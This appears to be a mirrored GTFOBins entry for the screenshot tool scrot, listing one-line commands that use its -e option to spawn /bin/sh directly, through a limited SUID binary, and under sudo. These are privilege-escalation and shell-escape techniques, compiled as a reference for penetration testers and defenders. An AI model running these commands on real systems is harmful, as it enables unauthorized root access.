mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
11 lines
193 B
Markdown
11 lines
193 B
Markdown
|
---
|
||
|
description: This requires a running X server.
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: scrot -e /bin/sh
|
||
|
limited-suid:
|
||
|
- code: ./scrot -e /bin/sh
|
||
|
sudo:
|
||
|
- code: sudo scrot -e /bin/sh
|
||
|
---
|